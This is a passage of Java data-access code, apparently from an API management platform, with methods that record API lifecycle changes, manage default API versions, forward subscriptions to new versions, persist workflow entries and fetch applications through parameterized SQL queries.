ps.executeUpdate(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the API state change record", e1); } } handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(selectQuerySt, null, null); APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } } public void updateDefaultAPIPublishedVersion(APIIdentifier identifier, String oldStatus, String newStatus) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (!oldStatus.equals(newStatus)) { if ((APIConstants.CREATED.equals(newStatus) || APIConstants.RETIRED.equals(newStatus)) && ( APIConstants.PUBLISHED.equals(oldStatus) || APIConstants.DEPRECATED.equals(oldStatus) || APIConstants.BLOCKED.equals(oldStatus))) { setPublishedDefVersion(identifier, conn, null); } else if (APIConstants.PUBLISHED.equals(newStatus) || APIConstants.DEPRECATED.equals(newStatus) || APIConstants.BLOCKED.equals(newStatus)) { setPublishedDefVersion(identifier, conn, identifier.getVersion()); } } conn.commit(); } catch (SQLException e) { handleException("Failed to update published default API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public List<LifeCycleEvent> getLifeCycleEvents(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_LIFECYCLE_EVENT_SQL; List<LifeCycleEvent> events = new ArrayList<LifeCycleEvent>(); try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); while (rs.next()) { LifeCycleEvent event = new LifeCycleEvent(); event.setApi(apiId); String oldState = rs.getString("PREVIOUS_STATE"); //event.setOldStatus(oldState != null ? APIStatus.valueOf(oldState) : null); event.setOldStatus(oldState != null ? 
oldState : null); //event.setNewStatus(APIStatus.valueOf(rs.getString("NEW_STATE"))); event.setNewStatus(rs.getString("NEW_STATE")); event.setUserId(rs.getString("USER_ID")); event.setDate(rs.getTimestamp("EVENT_DATE")); events.add(event); } Collections.sort(events, new Comparator<LifeCycleEvent>() { public int compare(LifeCycleEvent o1, LifeCycleEvent o2) { return o1.getDate().compareTo(o2.getDate()); } }); } catch (SQLException e) { handleException("Error when executing the SQL : " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return events; } public void makeKeysForwardCompatible(String provider, String apiName, String oldVersion, String newVersion, String context) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement addSubKeySt = null; PreparedStatement getAppSt = null; ResultSet rs = null; String getSubscriptionDataQuery = SQLConstants.GET_SUBSCRIPTION_DATA_SQL; String addSubKeyMapping = SQLConstants.ADD_SUBSCRIPTION_KEY_MAPPING_SQL; String getApplicationDataQuery = SQLConstants.GET_APPLICATION_DATA_SQL; try { // Retrieve all the existing subscription for the old version connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getSubscriptionDataQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, apiName); prepStmt.setString(3, oldVersion); rs = prepStmt.executeQuery(); List<SubscriptionInfo> subscriptionData = new ArrayList<SubscriptionInfo>(); Set<Integer> subscribedApplications = new HashSet<Integer>(); while (rs.next() && !(APIConstants.SubscriptionStatus.ON_HOLD.equals(rs.getString("SUB_STATUS")))) { SubscriptionInfo info = new SubscriptionInfo(); info.subscriptionId = rs.getInt("SUBSCRIPTION_ID"); info.tierId = rs.getString("TIER_ID"); info.applicationId = rs.getInt("APPLICATION_ID"); info.accessToken = rs.getString("ACCESS_TOKEN"); // no decryption needed. 
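                // The key type read here (e.g. PRODUCTION or SANDBOX) is copied unchanged into the
                // new subscription's key mapping further below.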
info.tokenType = rs.getString("KEY_TYPE"); subscriptionData.add(info); } Map<Integer, Integer> subscriptionIdMap = new HashMap<Integer, Integer>(); APIIdentifier apiId = new APIIdentifier(provider, apiName, newVersion); for (SubscriptionInfo info : subscriptionData) { try { if (!subscriptionIdMap.containsKey(info.subscriptionId)) { apiId.setTier(info.tierId); int subscriptionId = addSubscription(apiId, context, info.applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); if (subscriptionId == -1) { String msg = "Unable to add a new subscription for the API: " + apiName + ":v" + newVersion; log.error(msg); throw new APIManagementException(msg); } subscriptionIdMap.put(info.subscriptionId, subscriptionId); } int subscriptionId = subscriptionIdMap.get(info.subscriptionId); connection.setAutoCommit(false); addSubKeySt = connection.prepareStatement(addSubKeyMapping); addSubKeySt.setInt(1, subscriptionId); addSubKeySt.setString(2, info.accessToken); addSubKeySt.setString(3, info.tokenType); addSubKeySt.execute(); connection.commit(); subscribedApplications.add(info.applicationId); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { log.error("Error while adding subscription " + e.getMessage(), e); } } getAppSt = connection.prepareStatement(getApplicationDataQuery); getAppSt.setString(1, APIUtil.replaceEmailDomainBack(provider)); getAppSt.setString(2, apiName); getAppSt.setString(3, oldVersion); rs = getAppSt.executeQuery(); while (rs.next()) { int applicationId = rs.getInt("APPLICATION_ID"); if (!subscribedApplications.contains(applicationId)) { apiId.setTier(rs.getString("TIER_ID")); try { addSubscription(apiId, rs.getString("CONTEXT"), applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { //Not handled as an error because same subscription can be there in many previous versions. //Ex: if previous version was created by another older version and if the subscriptions are //Forwarded, then the third one will get same subscription from previous two versions. 
log.info("Subscription already exists: " + e.getMessage()); } } } } catch (SQLException e) { handleException("Error when executing the SQL queries", e); } finally { APIMgtDBUtil.closeAllConnections(getAppSt, null, null); APIMgtDBUtil.closeAllConnections(addSubKeySt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public void addAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String query = SQLConstants.ADD_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query, new String[]{"api_id"}); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(2, api.getId().getApiName()); prepStmt.setString(3, api.getId().getVersion()); prepStmt.setString(4, api.getContext()); String contextTemplate = api.getContextTemplate(); //Validate if the API has an unsupported context before executing the query String invalidContext = "/" + APIConstants.VERSION_PLACEHOLDER; if (invalidContext.equals(contextTemplate)) { throw new APIManagementException("Cannot add API : " + api.getId() + " with unsupported context : " + contextTemplate); } //If the context template ends with {version} this means that the version will be at the end of the context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(5, contextTemplate); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setTimestamp(7, new Timestamp(System.currentTimeMillis())); prepStmt.setString(8, api.getApiLevelPolicy()); prepStmt.execute(); rs = prepStmt.getGeneratedKeys(); int apiId = -1; if (rs.next()) { apiId = rs.getInt(1); } connection.commit(); if (api.getScopes() != null) { synchronized (scopeMutex) { addScopes(api.getScopes(), api.getId(), apiId, tenantId); } } addURLTemplates(apiId, api, connection); String tenantUserName = MultitenantUtils .getTenantAwareUsername(APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); recordAPILifeCycleEvent(api.getId(), null, APIStatus.CREATED.toString(), tenantUserName, tenantId, connection); //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } connection.commit(); } catch (SQLException e) { handleException("Error while adding the API: " + api.getId() + " to the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public String getDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String oldDefaultVersion = null; String query = SQLConstants.GET_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); if (rs.next()) { oldDefaultVersion = rs.getString("DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } 
return oldDefaultVersion; } /** * Persists WorkflowDTO to Database * * @param workflow * @throws APIManagementException */ public void addWorkflowEntry(WorkflowDTO workflow) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.ADD_WORKFLOW_ENTRY_SQL; try { Timestamp cratedDateStamp = new Timestamp(workflow.getCreatedTime()); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflow.getWorkflowReference()); prepStmt.setString(2, workflow.getWorkflowType()); prepStmt.setString(3, workflow.getStatus().toString()); prepStmt.setTimestamp(4, cratedDateStamp); prepStmt.setString(5, workflow.getWorkflowDescription()); prepStmt.setInt(6, workflow.getTenantId()); prepStmt.setString(7, workflow.getTenantDomain()); prepStmt.setString(8, workflow.getExternalWorkflowReference()); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while adding Workflow : " + workflow.getExternalWorkflowReference() + " to the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void updateWorkflowStatus(WorkflowDTO workflowDTO) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.UPDATE_WORKFLOW_ENTRY_SQL; try { Timestamp updatedTimeStamp = new Timestamp(workflowDTO.getUpdatedTime()); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowDTO.getStatus().toString()); prepStmt.setString(2, workflowDTO.getWorkflowDescription()); prepStmt.setString(3, workflowDTO.getExternalWorkflowReference()); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while updating Workflow Status of workflow " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Returns a workflow object for a given external workflow reference. 
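 * <p>
 * Illustrative usage (editorial sketch; the reference value is a placeholder):
 * <pre>{@code
 * WorkflowDTO workflow = dao.retrieveWorkflow("external-wf-reference");
 * // 'workflow' remains null when no entry matches the given external reference.
 * }</pre>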
* * @param workflowReference * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflow(String workflowReference) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } /** * Returns a workflow object for a given internal workflow reference and the workflow type. * * @param workflowReference * @param workflowType * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflowFromInternalReference(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_FROM_INTERNAL_REF_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); prepStmt.setString(2, workflowType); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } private void setPublishedDefVersion(APIIdentifier apiId, Connection connection, String value) throws APIManagementException { String queryDefaultVersionUpdate = SQLConstants.UPDATE_PUBLISHED_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionUpdate = null; try { prepStmtDefVersionUpdate = connection.prepareStatement(queryDefaultVersionUpdate); prepStmtDefVersionUpdate.setString(1, value); prepStmtDefVersionUpdate.setString(2, apiId.getApiName()); prepStmtDefVersionUpdate.setString(3, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionUpdate.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the 
" + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionUpdate, null, null); } } /** * Sets/removes default api entry such that api will not represent as default api further. * If the api's version is the same as the published version, then the whole entry will be removed. * Otherwise only the default version attribute is set to null. * * @param apiId * @param connection * @return * @throws APIManagementException */ public void removeAPIFromDefaultVersion(APIIdentifier apiId, Connection connection) throws APIManagementException { String queryDefaultVersionDelete = SQLConstants.REMOVE_API_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionDelete = null; try { prepStmtDefVersionDelete = connection.prepareStatement(queryDefaultVersionDelete); prepStmtDefVersionDelete.setString(1, apiId.getApiName()); prepStmtDefVersionDelete.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionDelete.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionDelete, null, null); } } public String getPublishedDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String publishedDefaultVersion = null; String query = SQLConstants.GET_PUBLISHED_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); while (rs.next()) { publishedDefaultVersion = rs.getString("PUBLISHED_DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return publishedDefaultVersion; } public void addUpdateAPIAsDefaultVersion(API api, Connection connection) throws APIManagementException { String publishedDefaultVersion = getPublishedDefaultVersion(api.getId()); removeAPIFromDefaultVersion(api.getId(), connection); PreparedStatement prepStmtDefVersionAdd = null; String queryDefaultVersionAdd = SQLConstants.ADD_API_DEFAULT_VERSION_SQL; try { prepStmtDefVersionAdd = connection.prepareStatement(queryDefaultVersionAdd); prepStmtDefVersionAdd.setString(1, api.getId().getApiName()); prepStmtDefVersionAdd.setString(2, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmtDefVersionAdd.setString(3, api.getId().getVersion()); String apistatus = api.getStatus(); if (APIConstants.PUBLISHED.equals(apistatus) || APIConstants.DEPRECATED.equals(apistatus) || APIConstants .BLOCKED.equals(apistatus)) { prepStmtDefVersionAdd.setString(4, api.getId().getVersion()); } else { prepStmtDefVersionAdd.setString(4, publishedDefaultVersion); } prepStmtDefVersionAdd.execute(); } catch (SQLException e) { handleException("Error while adding the API default version entry: " + api.getId().getApiName() + " to " + "the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionAdd, null, null); } } /** * Adds URI templates define for an API * * @param apiId * @param api * @param connection * @throws APIManagementException */ public void addURLTemplates(int apiId, API api, Connection connection) throws APIManagementException { if (apiId == -1) { 
//application addition has failed return; } PreparedStatement prepStmt = null; PreparedStatement scopePrepStmt = null; String query = SQLConstants.ADD_URL_MAPPING_SQL; String scopeQuery = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; try { prepStmt = connection.prepareStatement(query); scopePrepStmt = connection.prepareStatement(scopeQuery); Iterator<URITemplate> uriTemplateIterator = api.getUriTemplates().iterator(); URITemplate uriTemplate; for (; uriTemplateIterator.hasNext(); ) { uriTemplate = uriTemplateIterator.next(); prepStmt.setInt(1, apiId); prepStmt.setString(2, uriTemplate.getHTTPVerb()); prepStmt.setString(3, uriTemplate.getAuthType()); prepStmt.setString(4, uriTemplate.getUriTemplate()); //If API policy is available then set it for all the resources. if (StringUtils.isEmpty(api.getApiLevelPolicy())) { prepStmt.setString(5, (StringUtils.isEmpty(uriTemplate.getThrottlingTier())) ? APIConstants.UNLIMITED_TIER : uriTemplate.getThrottlingTier()); } else { prepStmt.setString(5, (StringUtils.isEmpty(api.getApiLevelPolicy())) ? APIConstants.UNLIMITED_TIER : api.getApiLevelPolicy()); } InputStream is; if (uriTemplate.getMediationScript() != null) { is = new ByteArrayInputStream(uriTemplate.getMediationScript().getBytes(Charset.defaultCharset())); } else { is = null; } if (connection.getMetaData().getDriverName().contains("PostgreSQL") || connection.getMetaData() .getDatabaseProductName().contains("DB2")) { if (uriTemplate.getMediationScript() != null) { prepStmt.setBinaryStream(6, is, uriTemplate.getMediationScript().getBytes(Charset.defaultCharset()).length); } else { prepStmt.setBinaryStream(6, is, 0); } } else { prepStmt.setBinaryStream(6, is); } prepStmt.addBatch(); if (uriTemplate.getScope() != null) { scopePrepStmt.setString(1, APIUtil.getResourceKey(api, uriTemplate)); if (uriTemplate.getScope().getId() == 0) { String scopeKey = uriTemplate.getScope().getKey(); Scope scopeByKey = APIUtil.findScopeByKey(api.getScopes(), scopeKey); if (scopeByKey != null) { if (scopeByKey.getId() > 0) { uriTemplate.getScopes().setId(scopeByKey.getId()); } } } scopePrepStmt.setInt(2, uriTemplate.getScope().getId()); scopePrepStmt.setInt(3, APIUtil.getTenantId(APIUtil.replaceEmailDomainBack(api.getId() .getProviderName()))); scopePrepStmt.addBatch(); } } prepStmt.executeBatch(); prepStmt.clearBatch(); scopePrepStmt.executeBatch(); scopePrepStmt.clearBatch(); } catch (SQLException e) { handleException("Error while adding URL template(s) to the database for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, null); APIMgtDBUtil.closeAllConnections(scopePrepStmt, null, null); } } /** * Fetches an Application with OAuth Apps, by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationWithOAuthApps(String applicationName, String userId, String groupId) throws APIManagementException { Application application = getApplicationByName(applicationName, userId, groupId); if (application != null) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return application; } /** * Checks whether application is accessible to the specified user * * @param applicationID ID of the Application * @param userId Name of the User. 
* @param groupId Group IDs * @throws APIManagementException */ public boolean isAppAllowed(int applicationID, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); String query = "SELECT APP.APPLICATION_ID FROM AM_SUBSCRIBER SUB, AM_APPLICATION APP"; String whereClause = " WHERE SUB.USER_ID =? AND APP.APPLICATION_ID=? AND " + "SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.APPLICATION_ID=? AND SUB" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (!StringUtils.isEmpty(groupId) && !APIConstants.NULL_GROUPID_LIST.equals(groupId)) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); query += whereClauseWithMultiGroupId; String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setInt(++parameterIndex, applicationID); } else { query += whereClauseWithGroupId; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setInt(3, applicationID); } } else { if (forceCaseInsensitiveComparisons) { query += whereClauseCaseInSensitive; } else { query += whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setInt(2, applicationID); } rs = prepStmt.executeQuery(); while (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while checking whether the application : " + applicationID + " is accessible " + "to user " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return false; } /** * Fetches an Application by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationByName(String applicationName, String userId, String groupId) throws APIManagementException { //mysql> select APP.APPLICATION_ID, APP.NAME, APP.SUBSCRIBER_ID,APP.APPLICATION_TIER,APP.CALLBACK_URL,APP // .DESCRIPTION, // APP.APPLICATION_STATUS from AM_SUBSCRIBER as SUB,AM_APPLICATION as APP // where SUB.user_id='admin' AND APP.name='DefaultApplication' AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_NAME_PREFIX; String whereClause = " WHERE SUB.USER_ID =? AND APP.NAME=? 
AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.NAME=? AND SUB" + "" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithGroupIdCaseInSensitive = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?))) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupIdCaseInSensitive = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR LOWER(SUB.USER_ID) = LOWER(?) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setString(++parameterIndex, applicationName); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setString(3, applicationName); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setString(2, applicationName); } rs = prepStmt.executeQuery(); while (rs.next()) { String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); if 
(multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } private void setGroupIdInApplication(Application application) throws APIManagementException { String applicationGroupId = application.getGroupId(); if (StringUtils.isEmpty(applicationGroupId)) { // No migrated App groupId application.setGroupId(getGroupId(application.getId())); } else { // Migrated data exists where Group ID for this App has been stored in AM_APPLICATION table // in the format 'tenant/groupId', so extract groupId value and store it in the App object String[] split = applicationGroupId.split("/"); if (split.length == 2) { application.setGroupId(split[1]); } else { log.error("Migrated Group ID: " + applicationGroupId + "does not follow the expected format 'tenant/groupId'"); } } } public Application getApplicationById(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); 